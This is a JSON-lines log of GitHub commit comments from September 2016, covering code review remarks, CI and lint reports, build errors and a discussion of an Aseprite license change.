{"id":"4503571074","type":"CommitCommentEvent","actor":{"login":"ZedCee"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18866258,"position":null,"line":null,"path":null,"commit_id":"8b64474d4ad7adb75b99ec096e7e2e5ae699130c","created_at":"2016-09-01T16:12:15Z","updated_at":"2016-09-01T16:12:15Z","body":"Please...\r\nNo more cutlery references."}},"created_at":"2016-09-01T16:12:15Z"}
{"id":"4503571435","type":"CommitCommentEvent","actor":{"login":"Dillybob92"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18866260,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T16:12:18Z","updated_at":"2016-09-01T16:12:18Z","body":"Thank you @dacap was over-thinking this commit too much! Thanks for the fast answers! I always credit though, so hopefully that helps get the word out!"}},"created_at":"2016-09-01T16:12:18Z"}
{"id":"4503576415","type":"CommitCommentEvent","actor":{"login":"mikemand"},"repo":{"name":"AsgardCms/Core"},"payload":{"comment":{"id":18866271,"position":45,"line":274,"path":"Providers/CoreServiceProvider.php","commit_id":"2bf887ca4b0e8f4af6436bbf00e6604b77828f91","created_at":"2016-09-01T16:13:12Z","updated_at":"2016-09-01T16:13:12Z","body":"Don't forget in Laravel 5.3 the parenthesis are no longer sent along with the arguments. This line needs to be changed to:\r\n\r\n```php\r\nreturn str_getcsv($argumentString, ',', \"'\");\r\n```"}},"created_at":"2016-09-01T16:13:12Z"}
{"id":"4503579314","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.caching"},"payload":{"comment":{"id":18866276,"position":null,"line":null,"path":null,"commit_id":"268aead9f722e0cfa92a14fb8fa3e817f7021921","created_at":"2016-09-01T16:13:43Z","updated_at":"2016-09-01T16:13:43Z","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.caching/3/violations\n```\nplone/caching/utils.py:69:12: S001 found %s formatter\nplone/caching/utils.py:73:12: S001 found %s formatter\nplone/caching/tests/test_hooks.py:1141:9: B901 blind except: statement\nplone/caching/tests/test_lookup.py:32:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_lookup.py:38:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:63:13: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:63:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:80:13: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:80:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:97:13: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:97:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:111:13: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:111:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:131:45: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:156:13: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:156:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:176:46: Q000 Remove bad quotes.\nplone/caching/tests/test_operations.py:192:46: Q000 Remove bad quotes.\nplone/caching/tests/test_utils.py:33:14: D001 found failUnless( replace it with assertTrue\nplone/caching/tests/test_utils.py:44:14: D001 found failUnless( replace it with assertTrue\nplone/caching/tests/test_utils.py:61:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:82:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:101:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:115:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:135:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:163:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_utils.py:189:14: D001 found assertEquals replace it with assertEqual\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-01T16:13:43Z"}
{"id":"4503579582","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18866278,"position":null,"line":null,"path":null,"commit_id":"7176894fad445f7aec436e9593c7aa7d0e99dab0","created_at":"2016-09-01T16:13:46Z","updated_at":"2016-09-01T16:13:46Z","body":"fast-forwarding develop-2.2-job-switches to borshop-integration-1469-develop-2.2-job-switches-code-abstraction = d368032c"}},"created_at":"2016-09-01T16:13:46Z"}
{"id":"4503580430","type":"CommitCommentEvent","actor":{"login":"singhravi"},"repo":{"name":"ravigkl/spring-batch-demo2"},"payload":{"comment":{"id":18866282,"position":null,"line":null,"path":null,"commit_id":"8134137c73e6d9a180a41192caa38eabe6ad5b85","created_at":"2016-09-01T16:13:55Z","updated_at":"2016-09-01T16:13:55Z","body":"Added Working example for the Spring Batch batch with Quartz Scheduler"}},"created_at":"2016-09-01T16:13:55Z"}
{"id":"4503580462","type":"CommitCommentEvent","actor":{"login":"symaddox58"},"repo":{"name":"symaddox58/Maddox-Assignment"},"payload":{"comment":{"id":18866283,"position":null,"line":null,"path":null,"commit_id":"d8b6dfae795f1c9f532b2045b73c9af3fbaa99e9","created_at":"2016-09-01T16:13:56Z","updated_at":"2016-09-01T16:13:56Z","body":"No comment"}},"created_at":"2016-09-01T16:13:56Z"}
{"id":"4503583845","type":"CommitCommentEvent","actor":{"login":"nturaga"},"repo":{"name":"galaxyproject/ansible-galaxy-tools"},"payload":{"comment":{"id":18866291,"position":null,"line":null,"path":null,"commit_id":"5eff8f7b603fe8c4207afce7e363ca7941fa3af6","created_at":"2016-09-01T16:14:32Z","updated_at":"2016-09-01T16:14:32Z","body":"Good catch on this 👍 @afgane "}},"created_at":"2016-09-01T16:14:32Z"}
{"id":"4503588984","type":"CommitCommentEvent","actor":{"login":"jeffbrown"},"repo":{"name":"ejaz-ahmed/grails-messages"},"payload":{"comment":{"id":18866300,"position":10,"line":10,"path":"grails-app/controllers/demo/SignupController.groovy","commit_id":"bd248c6d983c9e5595e0515aecfd5f435c13b993","created_at":"2016-09-01T16:15:28Z","updated_at":"2016-09-01T16:15:28Z","body":"Does this `responseFormats` property do anything in a case like this? "}},"created_at":"2016-09-01T16:15:28Z"}
{"id":"4503590121","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18866304,"position":null,"line":null,"path":null,"commit_id":"44e9cdbf190743ca351539f3eacd013dd0a352d5","created_at":"2016-09-01T16:15:40Z","updated_at":"2016-09-01T16:15:40Z","body":"messageID data type may cause more collisions because the hash is 64 bit lulz."}},"created_at":"2016-09-01T16:15:40Z"}
{"id":"4503590781","type":"CommitCommentEvent","actor":{"login":"abhijit-mahajani-imgtec"},"repo":{"name":"Avinash95/openwrt"},"payload":{"comment":{"id":18866307,"position":null,"line":null,"path":null,"commit_id":"34c872787a1292e9c246ffe2014b58c92e6ab9ba","created_at":"2016-09-01T16:15:46Z","updated_at":"2016-09-01T16:15:46Z","body":"test with ca8210 profile"}},"created_at":"2016-09-01T16:15:46Z"}
{"id":"4503592285","type":"CommitCommentEvent","actor":{"login":"abhijit-mahajani-imgtec"},"repo":{"name":"Avinash95/openwrt"},"payload":{"comment":{"id":18866311,"position":null,"line":null,"path":null,"commit_id":"34c872787a1292e9c246ffe2014b58c92e6ab9ba","created_at":"2016-09-01T16:16:03Z","updated_at":"2016-09-01T16:16:03Z","body":"Approved"}},"created_at":"2016-09-01T16:16:03Z"}
{"id":"4503593693","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18866316,"position":null,"line":null,"path":null,"commit_id":"bcd2a2af8ad5f7aebce4c5e7fc0ec5b2f373cd24","created_at":"2016-09-01T16:16:18Z","updated_at":"2016-09-01T16:16:18Z","body":"`canLogout()` should do those checks, why this is better?"}},"created_at":"2016-09-01T16:16:18Z"}
{"id":"4503595920","type":"CommitCommentEvent","actor":{"login":"richm"},"repo":{"name":"nhosoi/origin-aggregated-logging"},"payload":{"comment":{"id":18866324,"position":6,"line":16,"path":"fluentd/configs.d/openshift/output-es-config.conf","commit_id":"42a383ae1695132d3f3814004430a1c6430e0c13","created_at":"2016-09-01T16:16:43Z","updated_at":"2016-09-01T16:16:43Z","body":"```\r\n +      remove_keys ${rv=['es_type']; keep_fields={'systemd' => 'systemd', 'kubernetes' => 'kubernetes', 'docker' => 'docker', 'hostname' => 'hostname', 'ident' => 'ident', 'ipaddr4' => 'ipaddr4', 'ipaddr6' => 'ipaddr6', 'message' => 'message', 'version' => version', 'level' => 'level', 'CEE' => 'CEE', 'file' => 'file', 'geoip' => 'geoip', 'offset' => 'offset', 'pid' => 'pid', 'pipeline_metadata' => 'pipeline_metadata', 'rsyslog' => 'rsyslog', 'service' => 'service', 'tags' => 'tags'}; undefined = record.reject{|k,v| keep_fields.key?(k)}; record['undefined'] = undefined if undefined; (rv+undefined.keys).join(',')} \r\n```"}},"created_at":"2016-09-01T16:16:43Z"}
{"id":"4503596247","type":"CommitCommentEvent","actor":{"login":"richm"},"repo":{"name":"nhosoi/origin-aggregated-logging"},"payload":{"comment":{"id":18866326,"position":6,"line":16,"path":"fluentd/configs.d/openshift/output-es-ops-config.conf","commit_id":"42a383ae1695132d3f3814004430a1c6430e0c13","created_at":"2016-09-01T16:16:47Z","updated_at":"2016-09-01T16:16:47Z","body":"```\r\n +      remove_keys ${rv=['es_type']; keep_fields={'systemd' => 'systemd', 'kubernetes' => 'kubernetes', 'docker' => 'docker', 'hostname' => 'hostname', 'ident' => 'ident', 'ipaddr4' => 'ipaddr4', 'ipaddr6' => 'ipaddr6', 'message' => 'message', 'version' => version', 'level' => 'level', 'CEE' => 'CEE', 'file' => 'file', 'geoip' => 'geoip', 'offset' => 'offset', 'pid' => 'pid', 'pipeline_metadata' => 'pipeline_metadata', 'rsyslog' => 'rsyslog', 'service' => 'service', 'tags' => 'tags'}; undefined = record.reject{|k,v| keep_fields.key?(k)}; record['undefined'] = undefined if undefined; (rv+undefined.keys).join(',')} \r\n```"}},"created_at":"2016-09-01T16:16:47Z"}
{"id":"4503598209","type":"CommitCommentEvent","actor":{"login":"cpitclaudel"},"repo":{"name":"flycheck/flycheck"},"payload":{"comment":{"id":18866332,"position":null,"line":null,"path":null,"commit_id":"a8475a82177d30cb51480313eddaafb3d2d9aa79","created_at":"2016-09-01T16:17:09Z","updated_at":"2016-09-01T16:17:09Z","body":"Fixed :)"}},"created_at":"2016-09-01T16:17:09Z"}
{"id":"4503600343","type":"CommitCommentEvent","actor":{"login":"richm"},"repo":{"name":"nhosoi/origin-aggregated-logging"},"payload":{"comment":{"id":18866338,"position":null,"line":null,"path":null,"commit_id":"42a383ae1695132d3f3814004430a1c6430e0c13","created_at":"2016-09-01T16:17:32Z","updated_at":"2016-09-01T16:17:32Z","body":"Sorry - I was using `hsh` to do my testing (using irb) and forgot to change it back to `record` when I gave you the example."}},"created_at":"2016-09-01T16:17:32Z"}
{"id":"4503603451","type":"CommitCommentEvent","actor":{"login":"blairham"},"repo":{"name":"blairham/nuget-cookbook"},"payload":{"comment":{"id":18866348,"position":null,"line":null,"path":null,"commit_id":"cb69abe406e53d3918847134490f829a6c21e9da","created_at":"2016-09-01T16:18:06Z","updated_at":"2016-09-01T16:18:06Z","body":"Thats interesting, I wonder if it's due to the proxy driver. I'll look into that later, but for now will revert the inspec testing.\r\n\r\nhere is the output from my local run:\r\n\r\n  Command nuget\r\n     ✔  sources list stdout should match /name1 \\[Enabled\\]\\s+http:\\/\\/example.com\\/name1/\r\n     ✔  sources list stdout should not match /name2 \\[Enabled\\]\\s+http:\\/\\/example.com\\/name2/\r\n     ✔  sources list exit_status should eq 0\r\n\r\nSummary: 3 successful, 0 failures, 0 skipped\r\n       Finished verifying <default-windows-2012R2> (0m0.69s).\r\n       Finished testing <default-windows-2012R2> (2m16.90s).\r\n-----> Destroying <default-windows-2012R2>...\r\n       ==> default: Forcing shutdown of VM...\r\n       ==> default: Destroying VM and associated drives...\r\n       Vagrant instance <default-windows-2012R2> destroyed.\r\n       Finished destroying <default-windows-2012R2> (0m5.85s)."}},"created_at":"2016-09-01T16:18:06Z"}
{"id":"4503604566","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.caching"},"payload":{"comment":{"id":18866350,"position":null,"line":null,"path":null,"commit_id":"c42de95278a547bbccc4561bd3f5414b574c1e70","created_at":"2016-09-01T16:18:14Z","updated_at":"2016-09-01T16:18:14Z","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.caching/4/violations\n```\nplone/caching/utils.py:69:12: S001 found %s formatter\nplone/caching/utils.py:73:12: S001 found %s formatter\nplone/caching/tests/test_hooks.py:1141:9: B901 blind except: statement\nplone/caching/tests/test_lookup.py:32:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_lookup.py:38:14: D001 found assertEquals replace it with assertEqual\nplone/caching/tests/test_operations.py:63:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:80:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:97:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:111:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:156:14: S001 found %s formatter\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-01T16:18:14Z"}
{"id":"4503604975","type":"CommitCommentEvent","actor":{"login":"aeris"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18866352,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T16:18:17Z","updated_at":"2016-09-01T16:18:17Z","body":"Just a legal question. Do you ask *every* contributors of your project for licence change ?\r\nYou can’t just change your licence without the consent of everybody involved in the past on your project.\r\nBecause the code they wrote is and remain GPL until the contrary, and so, the overall project remains GPL until :\r\n * contributors explicitly consent to licence change\r\n * unconsenting contributors’ code is rewriting from scratch"}},"created_at":"2016-09-01T16:18:17Z"}
{"id":"4503608668","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.caching"},"payload":{"comment":{"id":18866360,"position":null,"line":null,"path":null,"commit_id":"0fe6e4be40f05e18bf6604ff766af98fa3e49fa5","created_at":"2016-09-01T16:18:58Z","updated_at":"2016-09-01T16:18:58Z","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.caching/5/violations\n```\nplone/caching/utils.py:69:12: S001 found %s formatter\nplone/caching/utils.py:73:12: S001 found %s formatter\nplone/caching/tests/test_hooks.py:1141:9: B901 blind except: statement\nplone/caching/tests/test_operations.py:63:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:80:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:97:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:111:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:156:14: S001 found %s formatter\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-01T16:18:58Z"}
{"id":"4503614116","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"conda-forge/conda-smithy"},"payload":{"comment":{"id":18866372,"position":19,"line":150,"path":"conda_smithy/configure_feedstock.py","commit_id":"eb09f6cc176eae683e58121f9f16e58b0664f6e7","created_at":"2016-09-01T16:20:00Z","updated_at":"2016-09-01T16:20:00Z","body":"I guess, we have `rerender`. But, what is the format of the target channels in `conda-forge.yml`. I have tried some combinations, but can't seem to find the right way. 😕 "}},"created_at":"2016-09-01T16:20:00Z"}
{"id":"4503614468","type":"CommitCommentEvent","actor":{"login":"dacap"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18866373,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T16:20:04Z","updated_at":"2016-09-01T16:20:04Z","body":"@aeris I didn't contact all developers yet, anyway we have a [CLA](https://github.com/aseprite/opensource/blob/master/cla.md) to sublicense code (created to a possible iOS version of Aseprite)."}},"created_at":"2016-09-01T16:20:04Z"}
{"id":"4503616197","type":"CommitCommentEvent","actor":{"login":"sgpyc"},"repo":{"name":"gunrock/gunrock"},"payload":{"comment":{"id":18866377,"position":null,"line":null,"path":null,"commit_id":"d971a8405acba0c29794470c94721e7ed1ec28ec","created_at":"2016-09-01T16:20:23Z","updated_at":"2016-09-01T16:20:23Z","body":"Maybe double check the boundaries between cub calls and gunrock kernel calls? The way mst calls cub does not allow the usage of CudaStream, which all other computation kernels / memory transfers run on. So there is cudaDeviceSynchronize() when moving from Cub to other, and cudaStreamSynchronize() when moving from other to Cub. You can check whether some of these sync points are omitted if debug is not enabled. "}},"created_at":"2016-09-01T16:20:23Z"}
{"id":"4503616291","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.caching"},"payload":{"comment":{"id":18866378,"position":null,"line":null,"path":null,"commit_id":"f266c44a2835e6e0e3141b4663a3c9fa47920838","created_at":"2016-09-01T16:20:24Z","updated_at":"2016-09-01T16:20:24Z","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.caching/6/violations\n```\nplone/caching/tests/test_hooks.py:1141:9: B901 blind except: statement\nplone/caching/tests/test_operations.py:63:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:80:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:97:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:111:14: S001 found %s formatter\nplone/caching/tests/test_operations.py:156:14: S001 found %s formatter\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-01T16:20:24Z"}
{"id":"4503619748","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18866380,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T16:21:00Z","updated_at":"2016-09-01T16:21:00Z","body":"@JFDaly here's the latest: https://mega.nz/#!KMVhEDST!pZFW0u3cZVIRavU9FnvLjAANasZx8As9GTO1fX_jwH8"}},"created_at":"2016-09-01T16:21:00Z"}
{"id":"4503619895","type":"CommitCommentEvent","actor":{"login":"ndown"},"repo":{"name":"SAP/openui5"},"payload":{"comment":{"id":18866381,"position":null,"line":null,"path":null,"commit_id":"348cdf88e51b0401c178d71d0756700ba479d37e","created_at":"2016-09-01T16:21:01Z","updated_at":"2016-09-01T16:21:01Z","body":"@goligo I do not quite understand how multiple sorters work would work (line 76 - 101). Is it intentional that deep sorting only works with a comparator returning 0?"}},"created_at":"2016-09-01T16:21:01Z"}
{"id":"4503620662","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18866384,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T16:21:12Z","updated_at":"2016-09-01T16:21:12Z","body":"@Iamblichos that makes sense, your latest solution works for me."}},"created_at":"2016-09-01T16:21:12Z"}
{"id":"4503621324","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18866387,"position":null,"line":null,"path":null,"commit_id":"1d0747181accead4fd74cdb18c43e996873a747e","created_at":"2016-09-01T16:21:20Z","updated_at":"2016-09-01T16:21:20Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.236.1d0747181accead4fd74cdb18c43e996873a747e](http://build.palaso.org/viewLog.html?buildId=76365&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 1492, ignored: 17 Build time: 00:07:21\n### Failed tests\n```\nGlyssenTests.dll: GlyssenTests.Dialogs.BlockNavigatorViewModelTests.SetBlockMatchupForCurrentVerse_VerseHasOnlyOneBlock_CurrentReferenceTextMatchupIsNull: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T16:21:20Z"}
{"id":"4503622298","type":"CommitCommentEvent","actor":{"login":"dacap"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18866392,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T16:21:29Z","updated_at":"2016-09-01T16:21:29Z","body":"I've just posted comments about this in the Aseprite devblog: http://dev.aseprite.org/post/149797781837/new-source-code-license"}},"created_at":"2016-09-01T16:21:29Z"}
{"id":"4503623425","type":"CommitCommentEvent","actor":{"login":"auscaster"},"repo":{"name":"sourcey/spectacle"},"payload":{"comment":{"id":18866399,"position":null,"line":null,"path":null,"commit_id":"8d9c47f8f04bae4ac03d39a79b0e6fcbb6515971","created_at":"2016-09-01T16:21:43Z","updated_at":"2016-09-01T16:21:43Z","body":"Thanks Peter :+1: "}},"created_at":"2016-09-01T16:21:43Z"}
{"id":"4503624738","type":"CommitCommentEvent","actor":{"login":"nuwang"},"repo":{"name":"gvlproject/cloudbridge"},"payload":{"comment":{"id":18866402,"position":25,"line":57,"path":"cloudbridge/__init__.py","commit_id":"70a86b03a4857b7957d3ce6438425231f0bf5668","created_at":"2016-09-01T16:21:57Z","updated_at":"2016-09-01T16:21:57Z","body":"@afgane I'm wondering whether we need a trace level or a customer CBLogger? If we define our levels carefully, I think we can avoid it? This would allow us to use standard logging, and avoid cloudbridge specific logging. For example, logging.getLogger('cloudbridge').setLevel(logging.INFO) would work, whereas if we use a custom logger, it would not, and thus require familiarity with cloudbridge internals to control logging levels externally. My understanding is that the logging.setLoggerClass will prevent logging inheritance?"}},"created_at":"2016-09-01T16:21:57Z"}
{"id":"4503628639","type":"CommitCommentEvent","actor":{"login":"f1u77y"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18866412,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T16:22:38Z","updated_at":"2016-09-01T16:22:38Z","body":"@liskin \r\n> Do you happen to know since when is this necessary?\r\n\r\nXMonad can be used not only as standalone WM but as WM for some DE. In that case DE's panel can start earlier than xmonad. Using `xmonad --replace` could be another case.\r\n\r\n> It's not a per-layout thing, it's a global cache.\r\n\r\nYes, it can be a global thing in many users' configs(I haven't seen anyone using `avoidStrutsOn`) but in the case when user has one layout with `avoidStrutsOn [U]` and other with `avoidStrutsOn [L]`, the cache should be per-layout.\r\n\r\n> You forgot to add this to the documentation.\r\n\r\nOh, yes. Will add ASAP.\r\n\r\n> Because now it's also necessary to add it here: https://github.com/xmonad/xmonad/blob/ec1a20c727b07dfc3b0eb11dd9aed00c7909f142/man/xmonad.hs#L78\r\n\r\nYes, that's true. And I think it'll be better option to add function `setLayoutAndUpdateDocks` for that.\r\n\r\n> just the first instance worked\r\n\r\nI think that's xmonad/xmonad-contrib#76"}},"created_at":"2016-09-01T16:22:38Z"}
{"id":"4503629754","type":"CommitCommentEvent","actor":{"login":"strann"},"repo":{"name":"hegemonic/taffydb"},"payload":{"comment":{"id":18866415,"position":null,"line":null,"path":null,"commit_id":"507d2d75fa16e1386f6d50abee1894b264d4458b","created_at":"2016-09-01T16:22:50Z","updated_at":"2016-09-01T16:22:50Z","body":"Hi this change looks to be breaking `npm install` for our Polymer dependency chain, any chance you can resolve this?\r\n\r\n```\r\nnpm ERR! Darwin 15.6.0\r\nnpm ERR! argv \"/usr/local/bin/node\" \"/usr/local/bin/npm\" \"install\"\r\nnpm ERR! node v6.5.0\r\nnpm ERR! npm  v3.10.3\r\n\r\nnpm ERR! Invalid Package: expected taffydb but found taffydb-jsdoc\r\n```"}},"created_at":"2016-09-01T16:22:50Z"}
{"id":"4503631747","type":"CommitCommentEvent","actor":{"login":"sdavis-r7"},"repo":{"name":"swagger-api/swagger-ui"},"payload":{"comment":{"id":18866420,"position":null,"line":null,"path":null,"commit_id":"dab8c4a0e3ae3968960f23afefae3a32b8fa7f01","created_at":"2016-09-01T16:23:13Z","updated_at":"2016-09-01T16:23:13Z","body":"@fehguy  excellent choice sir!"}},"created_at":"2016-09-01T16:23:13Z"}
{"id":"4503632942","type":"CommitCommentEvent","actor":{"login":"jeffdoolittle"},"repo":{"name":"JasperFx/marten"},"payload":{"comment":{"id":18866424,"position":null,"line":null,"path":null,"commit_id":"78631bd7a3a982b1a8a61597904955ec486b2970","created_at":"2016-09-01T16:23:26Z","updated_at":"2016-09-01T16:23:26Z","body":"awesome, thanks @jeremydmiller "}},"created_at":"2016-09-01T16:23:26Z"}
{"id":"4503635931","type":"CommitCommentEvent","actor":{"login":"rochoa"},"repo":{"name":"CartoDB/Windshaft-cartodb"},"payload":{"comment":{"id":18866430,"position":7,"line":10,"path":"NEWS.md","commit_id":"b56d110f5094e6eb8f39dbd875a4d6cc750584b9","created_at":"2016-09-01T16:23:59Z","updated_at":"2016-09-01T16:23:59Z","body":"No. Some of them were out of date, other didn't make sense anymore, and most of the rest were unmaintained and undocumented.\r\n\r\nIt would be nice to have some of them back, updated, and with good documentation. Any PR is welcome for that :-)."}},"created_at":"2016-09-01T16:23:59Z"}
{"id":"4503636075","type":"CommitCommentEvent","actor":{"login":"hugoabonizio"},"repo":{"name":"marceloboeira/bojack"},"payload":{"comment":{"id":18866431,"position":null,"line":null,"path":null,"commit_id":"3775425054c15dbe9136704e720878b53b1d9caf","created_at":"2016-09-01T16:24:01Z","updated_at":"2016-09-01T16:24:01Z","body":":smile: :+1:"}},"created_at":"2016-09-01T16:24:01Z"}
{"id":"4503638261","type":"CommitCommentEvent","actor":{"login":"chirino"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":18866440,"position":4,"line":109,"path":"components/camel-spring-boot/pom.xml","commit_id":"9ac4768eedacd7ec89cbf7faf80dab35f3154481","created_at":"2016-09-01T16:24:24Z","updated_at":"2016-09-01T16:24:24Z","body":"Tests were not properly tearing down previously created camel contexts.  It was throwing off the camel route count.  Forking the tests gives us a clean JVM to test in every time."}},"created_at":"2016-09-01T16:24:24Z"}
{"id":"4503638747","type":"CommitCommentEvent","actor":{"login":"ChrisVega"},"repo":{"name":"ChrisVega/Discord4J"},"payload":{"comment":{"id":18866442,"position":null,"line":null,"path":null,"commit_id":"9081079b0b4bfc8631e7efa2a3786992e7f7d14e","created_at":"2016-09-01T16:24:29Z","updated_at":"2016-09-01T16:24:29Z","body":"Forgot to mention it also allows the bot to reconnect not only on a WS disconnect on Discords end but also from internet outage. "}},"created_at":"2016-09-01T16:24:29Z"}
{"id":"4503642202","type":"CommitCommentEvent","actor":{"login":"chirino"},"repo":{"name":"apache/camel"},"payload":{"comment":{"id":18866455,"position":4,"line":188,"path":"components/camel-spring-boot/src/main/java/org/apache/camel/spring/boot/CamelAutoConfiguration.java","commit_id":"9ac4768eedacd7ec89cbf7faf80dab35f3154481","created_at":"2016-09-01T16:25:08Z","updated_at":"2016-09-01T16:25:08Z","body":"Yeah this is the fix.  The rest of the PR is test related. I'll add comment.  "}},"created_at":"2016-09-01T16:25:08Z"}
{"id":"4503651270","type":"CommitCommentEvent","actor":{"login":"andrew-elder"},"repo":{"name":"audioscience/avdecc-lib"},"payload":{"comment":{"id":18866475,"position":5,"line":154,"path":"controller/lib/src/linux/net_interface_imp.cpp","commit_id":"e6c36d457fbff885e0822f1022d30aa870104157","created_at":"2016-09-01T16:26:42Z","updated_at":"2016-09-01T16:26:42Z","body":"add \"because.....\""}},"created_at":"2016-09-01T16:26:42Z"}
{"id":"4503652355","type":"CommitCommentEvent","actor":{"login":"erusev"},"repo":{"name":"clippings/parsedown-provider"},"payload":{"comment":{"id":18866479,"position":null,"line":null,"path":null,"commit_id":"7e062021afcd921d8b3d9aa1157cb7cb2e4275e7","created_at":"2016-09-01T16:26:54Z","updated_at":"2016-09-01T16:26:54Z","body":"`tests/Fixtures/filters/parsedown.test` looks nice - is this a standard test format (the way the file is separated in sections) or is it something that you came up with"}},"created_at":"2016-09-01T16:26:54Z"}
{"id":"4503658480","type":"CommitCommentEvent","actor":{"login":"eblount"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18866496,"position":null,"line":null,"path":null,"commit_id":"51f7f695d384f8537b338f134376648849823833","created_at":"2016-09-01T16:28:02Z","updated_at":"2016-09-01T16:28:02Z","body":"@GrahamCampbell Could I please ask why this return was removed? I have a custom transport, and I was returning true/false based on the API result message. I was using the return value of Mail::send to report whether the email was sent."}},"created_at":"2016-09-01T16:28:02Z"}
{"id":"4503662627","type":"CommitCommentEvent","actor":{"login":"olivier-snl"},"repo":{"name":"Qthreads/qthreads"},"payload":{"comment":{"id":18866516,"position":null,"line":null,"path":null,"commit_id":"e989c6a3ecea40b88bca68e4a9f082f9746a4772","created_at":"2016-09-01T16:28:49Z","updated_at":"2016-09-01T16:28:49Z","body":"#29 Improvement on fix"}},"created_at":"2016-09-01T16:28:49Z"}
